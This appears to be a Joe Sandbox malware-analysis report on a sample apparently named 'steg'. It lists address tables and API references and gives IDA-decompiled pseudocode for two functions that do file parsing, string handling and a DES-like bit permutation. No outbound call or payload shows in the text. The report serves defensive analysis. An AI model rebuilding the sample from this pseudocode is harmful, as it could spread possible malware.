                                                                                                                    0x00fead7d
                                                                                                                    0x00feadb6
                                                                                                                    0x00feadbb
                                                                                                                    0x00feadbd
                                                                                                                    0x00feadbf
                                                                                                                    0x00feadc1
                                                                                                                    0x00feadc4
                                                                                                                    0x00feadc7
                                                                                                                    0x00feadc9
                                                                                                                    0x00feadc9
                                                                                                                    0x00feadcc
                                                                                                                    0x00feadce
                                                                                                                    0x00feadd0
                                                                                                                    0x00feadd1
                                                                                                                    0x00feadd2
                                                                                                                    0x00feaddc
                                                                                                                    0x00feadde
                                                                                                                    0x00feade1
                                                                                                                    0x00feade5
                                                                                                                    0x00feade9
                                                                                                                    0x00feadee
                                                                                                                    0x00feadf1
                                                                                                                    0x00feadf3
                                                                                                                    0x00feadf5
                                                                                                                    0x00feadf8
                                                                                                                    0x00feadfb
                                                                                                                    0x00feadfe
                                                                                                                    0x00feadfe
                                                                                                                    0x00feae01
                                                                                                                    0x00feae03
                                                                                                                    0x00feae05
                                                                                                                    0x00feae06
                                                                                                                    0x00feae07
                                                                                                                    0x00feae11
                                                                                                                    0x00feae13
                                                                                                                    0x00feae16
                                                                                                                    0x00feae1a
                                                                                                                    0x00feae1e
                                                                                                                    0x00feae23
                                                                                                                    0x00feae26
                                                                                                                    0x00feae28
                                                                                                                    0x00feae2a
                                                                                                                    0x00feae2d
                                                                                                                    0x00feae30
                                                                                                                    0x00feae33
                                                                                                                    0x00feae33
                                                                                                                    0x00feae36
                                                                                                                    0x00feae38
                                                                                                                    0x00feae3a
                                                                                                                    0x00feae3b
                                                                                                                    0x00feae3c
                                                                                                                    0x00feae41
                                                                                                                    0x00feae43
                                                                                                                    0x00feae45
                                                                                                                    0x00feae72
                                                                                                                    0x00feae7a
                                                                                                                    0x00feae7d
                                                                                                                    0x00feae80
                                                                                                                    0x00feae83
                                                                                                                    0x00feae86
                                                                                                                    0x00feae89
                                                                                                                    0x00feae8b
                                                                                                                    0x00000000
                                                                                                                    0x00feae8d
                                                                                                                    0x00feae90
                                                                                                                    0x00feae93
                                                                                                                    0x00feae99
                                                                                                                    0x00feae9c
                                                                                                                    0x00feae9f
                                                                                                                    0x00feae9f
                                                                                                                    0x00feae47
                                                                                                                    0x00feae47
                                                                                                                    0x00feae4d
                                                                                                                    0x00feae54
                                                                                                                    0x00feae55
                                                                                                                    0x00feae58
                                                                                                                    0x00feae58
                                                                                                                    0x00feae58
                                                                                                                    0x00feae5b
                                                                                                                    0x00feae5e
                                                                                                                    0x00feae5e
                                                                                                                    0x00feae5e
                                                                                                                    0x00feae5e
                                                                                                                    0x00feae49
                                                                                                                    0x00feae49
                                                                                                                    0x00feae4b
                                                                                                                    0x00feae68
                                                                                                                    0x00feae6a
                                                                                                                    0x00feae6c
                                                                                                                    0x00000000
                                                                                                                    0x00feae6e
                                                                                                                    0x00feae6e
                                                                                                                    0x00feae70
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00feae70
                                                                                                                    0x00feae6c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00feae4b
                                                                                                                    0x00feae47
                                                                                                                    0x00000000
                                                                                                                    0x00feae45
                                                                                                                    0x00feacf0
                                                                                                                    0x00feacf0
                                                                                                                    0x00feacfa
                                                                                                                    0x00feacfd
                                                                                                                    0x00fead04
                                                                                                                    0x00fead07
                                                                                                                    0x00fead0a
                                                                                                                    0x00fead0d
                                                                                                                    0x00fead14
                                                                                                                    0x00fead16
                                                                                                                    0x00fead1c
                                                                                                                    0x00fead1f
                                                                                                                    0x00feae61
                                                                                                                    0x00feae61
                                                                                                                    0x00fead25
                                                                                                                    0x00fead25
                                                                                                                    0x00fead26
                                                                                                                    0x00fead2c
                                                                                                                    0x00fead2e
                                                                                                                    0x00000000
                                                                                                                    0x00fead34
                                                                                                                    0x00fead37
                                                                                                                    0x00fead38
                                                                                                                    0x00fead3f
                                                                                                                    0x00fead43
                                                                                                                    0x00fead4a
                                                                                                                    0x00fead4c
                                                                                                                    0x00fead52
                                                                                                                    0x00000000
                                                                                                                    0x00fead52
                                                                                                                    0x00fead4c
                                                                                                                    0x00fead2e
                                                                                                                    0x00fead1f
                                                                                                                    0x00feacf2
                                                                                                                    0x00feacf2
                                                                                                                    0x00feacf8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00feacf8
                                                                                                                    0x00feacf0
                                                                                                                    0x00000000
                                                                                                                    0x00feacee
                                                                                                                    0x00feace1
                                                                                                                    0x00feaccf
                                                                                                                    0x00feaca2
                                                                                                                    0x00feaca2
                                                                                                                    0x00000000
                                                                                                                    0x00feaca4
                                                                                                                    0x00feaca4
                                                                                                                    0x00feacaa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00feacaa
                                                                                                                    0x00feaca2
                                                                                                                    0x00feac88
                                                                                                                    0x00feac88
                                                                                                                    0x00feac8e
                                                                                                                    0x00feac8e
                                                                                                                    0x00feac95
                                                                                                                    0x00feac96
                                                                                                                    0x00000000
                                                                                                                    0x00feac8a
                                                                                                                    0x00feac8a
                                                                                                                    0x00feac8c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00feac8c
                                                                                                                    0x00feac88
                                                                                                                    0x00feac86
                                                                                                                    0x00feac56
                                                                                                                    0x00feac56
                                                                                                                    0x00feac56
                                                                                                                    0x00feac5d
                                                                                                                    0x00feac5e
                                                                                                                    0x00feac60
                                                                                                                    0x00feac65
                                                                                                                    0x00feac65
                                                                                                                    0x00feac67
                                                                                                                    0x00feac6b
                                                                                                                    0x00feac6b

                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 00FEAC74
                                                                                                                      • Part of subcall function 00FEC705: __getptd_noexit.LIBCMT ref: 00FEC705
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00FEAD0D
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00FEAD43
                                                                                                                    • __gmtime64_s.LIBCMT ref: 00FEAD60
                                                                                                                    • __allrem.LIBCMT ref: 00FEADB6
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FEADD2
                                                                                                                    • __allrem.LIBCMT ref: 00FEADE9
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FEAE07
                                                                                                                    • __allrem.LIBCMT ref: 00FEAE1E
                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FEAE3C
                                                                                                                    • __invoke_watson.LIBCMT ref: 00FEAEAD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 384356119-0
                                                                                                                    • Opcode ID: 061e06230a02595ce45d74f4eee52ed1261026100781bc018d12ab560f8f8926
                                                                                                                    • Instruction ID: 1e63c9ad446987bd08299469f45d006d6fac75d1e0acee8e86c533b0caa56711
                                                                                                                    • Opcode Fuzzy Hash: 061e06230a02595ce45d74f4eee52ed1261026100781bc018d12ab560f8f8926
                                                                                                                    • Instruction Fuzzy Hash: 3B711772E00756ABD715AE7FCC81B6AB3A8AF40724F14412AF910D7681E774FD40AB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F8F737 Relevance: 13.7, APIs: 9, Instructions: 237COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 67%
                                                                                                                    			E00F8F737(intOrPtr _a4) {
				signed int _v8;
				char _v267;
				char _v268;
				char _v524;
				char _v1044;
				char _v2068;
				signed int _v2072;
				intOrPtr _v2084;
				intOrPtr _v2088;
				intOrPtr _v2092;
				signed int* _v2096;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t55;
				signed int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t83;
				signed int _t85;
				char _t86;
				signed int _t91;
				signed int _t96;
				signed int _t101;
				signed int _t106;
				signed int _t118;
				signed int _t123;
				signed int _t128;
				signed int _t133;
				signed int _t136;
				intOrPtr* _t138;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t144;
				signed int _t154;
				signed int _t158;
				void* _t160;
				intOrPtr* _t161;
				intOrPtr* _t166;
				void* _t168;
				signed int _t172;
				signed int _t176;
				signed int _t178;
				intOrPtr* _t179;
				signed int _t180;
				signed int _t183;
				void* _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int _t194;
				void* _t195;
				intOrPtr* _t196;
				signed int* _t198;
				void* _t199;
				signed int _t201;
				signed int _t202;
				signed int _t203;
				signed int _t204;
				signed int _t205;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t211;
				intOrPtr* _t212;
				signed int _t214;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t219;
				void* _t220;
				void* _t222;
				void* _t223;
				void* _t224;
				void* _t226;

				_v8 =  *0x481f80 ^ _t214;
				_v268 = 0;
				E00FE7C87( &_v267, 0, 0x103);
				_t217 = _t216 + 0xc;
				_t197 = 0;
				_t200 = 0;
				_t55 =  &_v524;
				if(_a4 != 0xf) {
					_push(0x471000);
				} else {
					_push(0x470fec);
				}
				_push(0x100);
				_push(_t55);
				E00FE7AF9();
				_t218 = _t217 + 0xc;
				_push( &_v268);
				_push(0);
				_push(0);
				_push(0x1a);
				_push(0);
				if( *0x470200() == 0) {
					E00FE7AF9( &_v1044, 0x208,  &_v268);
					E00FE7B4E( &_v1044, 0x208, 0x470790);
					E00FE7B4E( &_v1044, 0x208,  &_v524);
					E00FE7B4E( &_v1044, 0x208, 0x471010);
					_v2072 = _t200;
					_t71 = E00FE928A( &_v2072,  &_v1044, 0x470890);
					_t219 = _t218 + 0x3c;
					__eflags = _t71;
					if(_t71 != 0) {
						goto L5;
					} else {
						_t74 = _v2072;
						__eflags = _t74;
						if(__eflags == 0) {
							goto L5;
						} else {
							_push(_t74);
							_push(0x400);
							_push( &_v2068);
							_t76 = E00FE9087(_t160, _t197, _t200, __eflags);
							_t220 = _t219 + 0xc;
							__eflags = _t76;
							if(__eflags == 0) {
								L30:
								E00FE9010(_t160, _t197, _t200, __eflags);
								__eflags = _v8 ^ _t214;
								return E00FE72F2(_t197, _t160, _v8 ^ _t214, _t183, _t197, _t200, _v2072);
							} else {
								do {
									E00FE8317( &_v2068, 0x400);
									_t222 = _t220 + 8;
									__eflags = _t200;
									if(_t200 != 0) {
										_t83 = E00FE8487( &_v2068, 0x471030);
										_t223 = _t222 + 8;
										__eflags = _t83;
										if(__eflags != 0) {
											_t85 = E00FE8487( &_v2068, 0x471038);
											_t224 = _t223 + 8;
											__eflags = _t85;
											if(_t85 != 0) {
												 *_t85 = 0x5c;
											}
											_t166 =  &_v2068;
											_t184 = _t166 + 1;
											do {
												_t86 =  *_t166;
												_t166 = _t166 + 1;
												__eflags = _t86;
											} while (_t86 != 0);
											_t168 = _t166 - _t184 - 1;
											__eflags = _t168 - 0x400;
											if(_t168 >= 0x400) {
												E00FE7EEC();
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												asm("int3");
												_push(_t214);
												_push(_t200);
												_push(_t197);
												_t198 = _v2096;
												_t201 = _t198[1];
												_t185 =  *_t198;
												_t91 = (_t201 >> 0x00000004 ^ _t185) & 0x0f0f0f0f;
												_t186 = _t185 ^ _t91;
												_t202 = _t201 ^ _t91 << 0x00000004;
												_t96 = (_t186 >> 0x00000010 ^ _t202) & 0x0000ffff;
												_t203 = _t202 ^ _t96;
												_t187 = _t186 ^ _t96 << 0x00000010;
												_t101 = (_t203 >> 0x00000002 ^ _t187) & 0x33333333;
												_t188 = _t187 ^ _t101;
												_t204 = _t203 ^ _t101 << 0x00000002;
												_t106 = (_t188 >> 0x00000008 ^ _t204) & 0x00ff00ff;
												_t205 = _t204 ^ _t106;
												_t189 = _t188 ^ _t106 << 0x00000008;
												_t172 = (_t205 >> 0x00000001 ^ _t189) & 0x55555555;
												 *_t198 = _t172 ^ _t189;
												_t198[1] = _t172 + _t172 ^ _t205;
												E00F8FFF7(_t198, _v2084, 0);
												E00F8FFF7(_t198, _v2088, 1);
												E00F8FFF7(_t198, _v2092, 0);
												_t206 = _t198[1];
												_t190 =  *_t198;
												_t118 = (_t206 >> 0x00000001 ^ _t190) & 0x55555555;
												_t191 = _t190 ^ _t118;
												_t207 = _t206 ^ _t118 + _t118;
												_t123 = (_t191 >> 0x00000008 ^ _t207) & 0x00ff00ff;
												_t208 = _t207 ^ _t123;
												_t192 = _t191 ^ _t123 << 0x00000008;
												_t128 = (_t208 >> 0x00000002 ^ _t192) & 0x33333333;
												_t193 = _t192 ^ _t128;
												_t209 = _t208 ^ _t128 << 0x00000002;
												_t133 = (_t193 >> 0x00000010 ^ _t209) & 0x0000ffff;
												_t210 = _t209 ^ _t133;
												_t194 = _t193 ^ _t133 << 0x00000010;
												_t176 = (_t210 >> 0x00000004 ^ _t194) & 0x0f0f0f0f;
												_t136 = _t176 ^ _t194;
												_t178 = _t176 << 0x00000004 ^ _t210;
												__eflags = _t178;
												 *_t198 = _t136;
												_t198[1] = _t178;
												return _t136;
											} else {
												_push(_t160);
												 *((char*)(_t214 + _t168 - 0x810)) = _t86;
												_t138 = E00FE8487( &_v2068, 0x47103c);
												_t179 =  &_v268;
												_t226 = _t224 + 8;
												_t161 = _t138;
												_t32 = _t179 + 1; // 0x1
												_t195 = _t32;
												do {
													_t139 =  *_t179;
													_t179 = _t179 + 1;
													__eflags = _t139;
												} while (_t139 != 0);
												_t180 = _t179 - _t195;
												__eflags = _t180;
												_t196 =  &_v524;
												_t211 = _t196 + 1;
												do {
													_t140 =  *_t196;
													_t196 = _t196 + 1;
													__eflags = _t140;
												} while (_t140 != 0);
												_t183 = _t196 - _t211;
												__eflags = _t183;
												_t212 = _t161;
												_t35 = _t212 + 1; // 0x1
												_t199 = _t35;
												do {
													_t141 =  *_t212;
													_t212 = _t212 + 1;
													__eflags = _t141;
												} while (_t141 != 0);
												_t36 = _t180 + 3; // 0x4
												_t200 = _t212 - _t199 + _t36 + _t183;
												_t144 = E00FE7BCE(_t161, _t199, _t212 - _t199 + _t36 + _t183);
												_t197 = _t144;
												_t220 = _t226 + 4;
												__eflags = _t144;
												if(__eflags != 0) {
													E00FE7AF9(_t197, _t200,  &_v268);
													E00FE7B4E(_t197, _t200, 0x470790);
													E00FE7B4E(_t197, _t200,  &_v524);
													E00FE7B4E(_t197, _t200, 0x470790);
													_t39 = _t161 + 1; // 0x1
													E00FE7B4E(_t197, _t200, _t39);
													_t220 = _t220 + 0x3c;
												}
												_pop(_t160);
												goto L30;
											}
										} else {
											goto L14;
										}
									} else {
										_t158 = E00FE8487( &_v2068, 0x471020);
										_t223 = _t222 + 8;
										__eflags = _t158;
										if(__eflags != 0) {
											_t200 = 1;
										}
										goto L14;
									}
									goto L33;
									L14:
									_push(_v2072);
									_push(0x400);
									_push( &_v2068);
									_t154 = E00FE9087(_t160, _t197, _t200, __eflags);
									_t220 = _t223 + 0xc;
									__eflags = _t154;
								} while (__eflags != 0);
								E00FE9010(_t160, _t197, _t200, __eflags);
								__eflags = _v8 ^ _t214;
								return E00FE72F2(_t197, _t160, _v8 ^ _t214, _t183, _t197, _t200, _v2072);
							}
						}
					}
				} else {
					 *0x470124();
					L5:
					return E00FE72F2(0, _t160, _v8 ^ _t214, _t183, _t197, _t200);
				}
				L33:
			}
























































































                                                                                                                    0x00f8f747
                                                                                                                    0x00f8f75a
                                                                                                                    0x00f8f761
                                                                                                                    0x00f8f766
                                                                                                                    0x00f8f769
                                                                                                                    0x00f8f76b
                                                                                                                    0x00f8f771
                                                                                                                    0x00f8f777
                                                                                                                    0x00f8f780
                                                                                                                    0x00f8f779
                                                                                                                    0x00f8f779
                                                                                                                    0x00f8f779
                                                                                                                    0x00f8f785
                                                                                                                    0x00f8f78a
                                                                                                                    0x00f8f78b
                                                                                                                    0x00f8f790
                                                                                                                    0x00f8f799
                                                                                                                    0x00f8f79a
                                                                                                                    0x00f8f79c
                                                                                                                    0x00f8f79e
                                                                                                                    0x00f8f7a0
                                                                                                                    0x00f8f7aa
                                                                                                                    0x00f8f7d7
                                                                                                                    0x00f8f7ed
                                                                                                                    0x00f8f805
                                                                                                                    0x00f8f81b
                                                                                                                    0x00f8f833
                                                                                                                    0x00f8f839
                                                                                                                    0x00f8f83e
                                                                                                                    0x00f8f841
                                                                                                                    0x00f8f843
                                                                                                                    0x00000000
                                                                                                                    0x00f8f849
                                                                                                                    0x00f8f849
                                                                                                                    0x00f8f84f
                                                                                                                    0x00f8f851
                                                                                                                    0x00000000
                                                                                                                    0x00f8f857
                                                                                                                    0x00f8f857
                                                                                                                    0x00f8f85e
                                                                                                                    0x00f8f863
                                                                                                                    0x00f8f864
                                                                                                                    0x00f8f869
                                                                                                                    0x00f8f86c
                                                                                                                    0x00f8f86e
                                                                                                                    0x00f8f9e9
                                                                                                                    0x00f8f9ef
                                                                                                                    0x00f8f9fd
                                                                                                                    0x00f8fa08
                                                                                                                    0x00f8f877
                                                                                                                    0x00f8f877
                                                                                                                    0x00f8f883
                                                                                                                    0x00f8f888
                                                                                                                    0x00f8f891
                                                                                                                    0x00f8f893
                                                                                                                    0x00f8f8b4
                                                                                                                    0x00f8f8b9
                                                                                                                    0x00f8f8bc
                                                                                                                    0x00f8f8be
                                                                                                                    0x00f8f90a
                                                                                                                    0x00f8f90f
                                                                                                                    0x00f8f912
                                                                                                                    0x00f8f914
                                                                                                                    0x00f8f916
                                                                                                                    0x00f8f916
                                                                                                                    0x00f8f919
                                                                                                                    0x00f8f91f
                                                                                                                    0x00f8f927
                                                                                                                    0x00f8f927
                                                                                                                    0x00f8f929
                                                                                                                    0x00f8f92a
                                                                                                                    0x00f8f92a
                                                                                                                    0x00f8f930
                                                                                                                    0x00f8f931
                                                                                                                    0x00f8f937
                                                                                                                    0x00f8fa09
                                                                                                                    0x00f8fa0e
                                                                                                                    0x00f8fa0f
                                                                                                                    0x00f8fa10
                                                                                                                    0x00f8fa11
                                                                                                                    0x00f8fa12
                                                                                                                    0x00f8fa13
                                                                                                                    0x00f8fa14
                                                                                                                    0x00f8fa15
                                                                                                                    0x00f8fa16
                                                                                                                    0x00f8fa17
                                                                                                                    0x00f8fa1a
                                                                                                                    0x00f8fa1b
                                                                                                                    0x00f8fa1c
                                                                                                                    0x00f8fa21
                                                                                                                    0x00f8fa24
                                                                                                                    0x00f8fa2d
                                                                                                                    0x00f8fa32
                                                                                                                    0x00f8fa37
                                                                                                                    0x00f8fa40
                                                                                                                    0x00f8fa45
                                                                                                                    0x00f8fa4a
                                                                                                                    0x00f8fa53
                                                                                                                    0x00f8fa58
                                                                                                                    0x00f8fa5d
                                                                                                                    0x00f8fa69
                                                                                                                    0x00f8fa6e
                                                                                                                    0x00f8fa73
                                                                                                                    0x00f8fa7b
                                                                                                                    0x00f8fa85
                                                                                                                    0x00f8fa8d
                                                                                                                    0x00f8fa90
                                                                                                                    0x00f8fa9b
                                                                                                                    0x00f8faa6
                                                                                                                    0x00f8faab
                                                                                                                    0x00f8faae
                                                                                                                    0x00f8fab6
                                                                                                                    0x00f8fabb
                                                                                                                    0x00f8fabf
                                                                                                                    0x00f8fac8
                                                                                                                    0x00f8facd
                                                                                                                    0x00f8fad2
                                                                                                                    0x00f8fadb
                                                                                                                    0x00f8fae0
                                                                                                                    0x00f8fae5
                                                                                                                    0x00f8faf1
                                                                                                                    0x00f8faf6
                                                                                                                    0x00f8fafb
                                                                                                                    0x00f8fb04
                                                                                                                    0x00f8fb0c
                                                                                                                    0x00f8fb11
                                                                                                                    0x00f8fb11
                                                                                                                    0x00f8fb13
                                                                                                                    0x00f8fb15
                                                                                                                    0x00f8fb1b
                                                                                                                    0x00f8f93d
                                                                                                                    0x00f8f93d
                                                                                                                    0x00f8f93e
                                                                                                                    0x00f8f951
                                                                                                                    0x00f8f956
                                                                                                                    0x00f8f95c
                                                                                                                    0x00f8f95f
                                                                                                                    0x00f8f961
                                                                                                                    0x00f8f961
                                                                                                                    0x00f8f967
                                                                                                                    0x00f8f967
                                                                                                                    0x00f8f969
                                                                                                                    0x00f8f96a
                                                                                                                    0x00f8f96a
                                                                                                                    0x00f8f96e
                                                                                                                    0x00f8f96e
                                                                                                                    0x00f8f970
                                                                                                                    0x00f8f976
                                                                                                                    0x00f8f979
                                                                                                                    0x00f8f979
                                                                                                                    0x00f8f97b
                                                                                                                    0x00f8f97c
                                                                                                                    0x00f8f97c
                                                                                                                    0x00f8f980
                                                                                                                    0x00f8f980
                                                                                                                    0x00f8f982
                                                                                                                    0x00f8f984
                                                                                                                    0x00f8f984
                                                                                                                    0x00f8f987
                                                                                                                    0x00f8f987
                                                                                                                    0x00f8f989
                                                                                                                    0x00f8f98a
                                                                                                                    0x00f8f98a
                                                                                                                    0x00f8f98e
                                                                                                                    0x00f8f995
                                                                                                                    0x00f8f998
                                                                                                                    0x00f8f99d
                                                                                                                    0x00f8f99f
                                                                                                                    0x00f8f9a2
                                                                                                                    0x00f8f9a4
                                                                                                                    0x00f8f9af
                                                                                                                    0x00f8f9bb
                                                                                                                    0x00f8f9c9
                                                                                                                    0x00f8f9d5
                                                                                                                    0x00f8f9da
                                                                                                                    0x00f8f9e0
                                                                                                                    0x00f8f9e5
                                                                                                                    0x00f8f9e5
                                                                                                                    0x00f8f9e8
                                                                                                                    0x00000000
                                                                                                                    0x00f8f9e8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00f8f895
                                                                                                                    0x00f8f89b
                                                                                                                    0x00f8f8a0
                                                                                                                    0x00f8f8a3
                                                                                                                    0x00f8f8a5
                                                                                                                    0x00f8f8a7
                                                                                                                    0x00f8f8a7
                                                                                                                    0x00000000
                                                                                                                    0x00f8f8a5
                                                                                                                    0x00000000
                                                                                                                    0x00f8f8c0
                                                                                                                    0x00f8f8c0
                                                                                                                    0x00f8f8cc
                                                                                                                    0x00f8f8d1
                                                                                                                    0x00f8f8d2
                                                                                                                    0x00f8f8d7
                                                                                                                    0x00f8f8da
                                                                                                                    0x00f8f8da
                                                                                                                    0x00f8f8e4
                                                                                                                    0x00f8f8f3
                                                                                                                    0x00f8f8fd
                                                                                                                    0x00f8f8fd
                                                                                                                    0x00f8f86e
                                                                                                                    0x00f8f851
                                                                                                                    0x00f8f7ac
                                                                                                                    0x00f8f7ac
                                                                                                                    0x00f8f7b3
                                                                                                                    0x00f8f7c3
                                                                                                                    0x00f8f7c3
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_f80000_steg.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _strstr$_fgets$__wfopen_s_malloc_memset
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2443066643-0
                                                                                                                    • Opcode ID: cbc4664109ca34017ed911d0200bcaa0e92c1a35e4de850bbb2a854da42b782f
                                                                                                                    • Instruction ID: c8a62bdd5f6c700903b6e3a3574f9ed07886589afcf556a92dfe5a47648596a4
                                                                                                                    • Opcode Fuzzy Hash: cbc4664109ca34017ed911d0200bcaa0e92c1a35e4de850bbb2a854da42b782f
                                                                                                                    • Instruction Fuzzy Hash: 2D711C71E003596ADF20FA658C46FEE736CAF41304F1440F5F94CE6041EE799A899BA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00F93D37 Relevance: 13.6, APIs: 9, Instructions: 123COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 54%
                                                                                                                    			E00F93D37(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v8;
				intOrPtr _v140;
				char _v156;
				intOrPtr _v160;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t21;
				void* _t29;
				intOrPtr _t48;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				signed int _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t65;

				_t56 = __edx;
				_v8 =  *0x481f80 ^ _t60;
				_v160 = _a16;
				_t21 = E00FA4587(_t57, _a8);
				_t48 =  *0x48707c;
				_t62 = _t61 + 4;
				_t59 = _t21;
				if(_t48 == 0) {
					_v156 = 0x94;
					 *0x470118( &_v156);
					_t48 = (0 | _v140 == 0x00000002) + 1;
					 *0x48707c = _t48;
				}
				_push(0);
				_push(0);
				_push(0);
				_push(_t59);
				if(_t48 != 2) {
					_t13 =  *0x4700c0() + 3; // 0x3
					_t46 = _t13;
					_t58 = E00FE7BCE(_t46, _t57, _t46);
					_t63 = _t62 + 4;
					if(_t58 == 0) {
						goto L4;
					} else {
						 *0x4700c0(_t59, _t46, _t58, 0);
						E00FE8F6C(_t59);
						_t29 = E00FAB607(_t58);
						_t46 = _t29;
						_t65 = _t63 + 8;
						if(_t29 != 0) {
							_t59 = E00FE2987(_t48, _t46);
							E00FE8F6C(_t46);
							_t65 = _t65 + 8;
						} else {
							_t59 = 0;
						}
						E00FE8F6C(_t58);
						goto L12;
					}
				} else {
					_t10 =  *0x4700c4() + 3; // 0x3
					_t46 = _t10;
					_t53 = _t46 + _t46;
					_t58 = E00FE7BCE(_t46, _t57, _t46 + _t46);
					_t63 = _t62 + 4;
					if(_t58 != 0) {
						 *0x4700c4(_t59, _t46, _t58, 0);
						E00FE8F6C(_t59);
						_t59 = E00FE2987(_t53, _t58);
						E00FE8F6C(_t58);
						L12:
						if(_t59 == 0) {
							goto L5;
						} else {
							E00F971A7( *((intOrPtr*)(_a4 + 8)), _v160, 0x470310, _t59);
							E00FE8F6C(_t59);
							return E00FE72F2(0, _t46, _v8 ^ _t60, _t56, _t58, _t59);
						}
					} else {
						L4:
						E00FE8F6C(_t59);
						L5:
						return E00FE72F2(7, _t46, _v8 ^ _t60, _t56, _t58, _t59);
					}
				}
			}






















                                                                                                                    0x00f93d37
                                                                                                                    0x00f93d47
                                                                                                                    0x00f93d54
                                                                                                                    0x00f93d5a
                                                                                                                    0x00f93d5f
                                                                                                                    0x00f93d65
                                                                                                                    0x00f93d68
                                                                                                                    0x00f93d6c
                                                                                                                    0x00f93d75
                                                                                                                    0x00f93d7f
                                                                                                                    0x00f93d91
                                                                                                                    0x00f93d92
                                                                                                                    0x00f93d92
                                                                                                                    0x00f93d98
                                                                                                                    0x00f93d9a
                                                                                                                    0x00f93d9c
                                                                                                                    0x00f93d9e
                                                                                                                    0x00f93da2
                                                                                                                    0x00f93e08
                                                                                                                    0x00f93e08
                                                                                                                    0x00f93e11
                                                                                                                    0x00f93e13
                                                                                                                    0x00f93e18
                                                                                                                    0x00000000
                                                                                                                    0x00f93e1a
                                                                                                                    0x00f93e1f
                                                                                                                    0x00f93e26
                                                                                                                    0x00f93e2c
                                                                                                                    0x00f93e31
                                                                                                                    0x00f93e33
                                                                                                                    0x00f93e38
                                                                                                                    0x00f93e45
                                                                                                                    0x00f93e47
                                                                                                                    0x00f93e4c
                                                                                                                    0x00f93e3a
                                                                                                                    0x00f93e3a
                                                                                                                    0x00f93e3a
                                                                                                                    0x00f93e50
                                                                                                                    0x00000000
                                                                                                                    0x00f93e55
                                                                                                                    0x00f93da4
                                                                                                                    0x00f93daa
                                                                                                                    0x00f93daa
                                                                                                                    0x00f93dad
                                                                                                                    0x00f93db6
                                                                                                                    0x00f93db8
                                                                                                                    0x00f93dbd
                                                                                                                    0x00f93de3
                                                                                                                    0x00f93dea
                                                                                                                    0x00f93df6
                                                                                                                    0x00f93df8
                                                                                                                    0x00f93e58
                                                                                                                    0x00f93e5a
                                                                                                                    0x00000000
                                                                                                                    0x00f93e60
                                                                                                                    0x00f93e72
                                                                                                                    0x00f93e78
                                                                                                                    0x00f93e92
                                                                                                                    0x00f93e92
                                                                                                                    0x00f93dbf
                                                                                                                    0x00f93dbf
                                                                                                                    0x00f93dc0
                                                                                                                    0x00f93dca
                                                                                                                    0x00f93ddd
                                                                                                                    0x00f93ddd
                                                                                                                    0x00f93dbd

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.282081034.0000000000F82000.00000002.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.282060224.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
